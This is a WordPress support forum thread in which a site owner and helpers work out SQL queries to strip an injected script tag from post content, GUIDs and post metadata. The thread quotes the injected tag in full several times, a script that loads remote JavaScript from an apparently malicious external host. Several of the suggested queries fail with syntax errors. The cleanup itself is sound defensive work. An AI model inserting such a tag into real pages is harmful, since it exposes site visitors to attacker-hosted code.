DB injection

Viewing 5 replies - 1 through 5 (of 5 total)
  • duke78

    (@duke78)

    4 years, 7 months ago

    try …
    UPDATE wp_posts SET post_content = replace(post_content, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    UPDATE wp_posts SET guid = replace(guid, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    UPDATE wp_postmeta SET meta_value = replace(meta_value, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    • This reply was modified 4 years, 7 months ago by duke78.
    • This reply was modified 4 years, 7 months ago by duke78.
    Thread Starter Gabriel81

    (@gcaustrita)

    4 years, 7 months ago

    Thanks for replying Duke. It doesnt seem to be working. Im using phpmyadmin 3.5.5. Received a different error this time using the code you provided:

    Error
    There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem

    ERROR: Unknown Punctuation String @ 77
    STR: ://
    SQL: UPDATE wp_posts SET post_content = replace(post_content, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    UPDATE wp_posts SET guid = replace(guid, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    UPDATE wp_postmeta SET meta_value = replace(meta_value, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    SQL query:

    UPDATE wp_posts SET post_content = replace(post_content, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”) UPDATE wp_posts SET guid = replace(guid, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”) UPDATE wp_postmeta SET meta_value = replace(meta_value, “<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>”,”)

    MySQL said: Documentation

    #1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript la’ at line 1

    duke78

    (@duke78)

    4 years, 7 months ago

    i think your error came from the false ‘ ” ”!

    replace ” with ‘

    thats the correct query:
    UPDATE wp_posts SET guid = replace(guid, ‘<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>’,”)

    Thread Starter Gabriel81

    (@gcaustrita)

    4 years, 7 months ago

    I tried that and received a different syntax error:

    Error
    There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem

    ERROR: Unknown Punctuation String @ 61
    STR: ://
    SQL: UPDATE wp_posts SET guid = replace(guid, ‘<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>’,”)

    SQL query:

    UPDATE wp_posts SET guid = replace(guid, ‘<script src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript language=javascript></script>’,”)

    MySQL said: Documentation

    #1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘src=’https://js.wiilberedmodels.com/pystats.js?l=l&’ type=text/javascript la’ at line 1

    Thread Starter Gabriel81

    (@gcaustrita)

    4 years, 7 months ago

    My buddy fixed the syntax!!

    UPDATE wp_posts SET guid = replace(guid, ‘<script src=\’https\:\/\/js.wiilberedmodels.com/pystats.js?l=l&\’ type=text/javascript language=javascript></script>’,”)

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘DB injection’ is closed to new replies.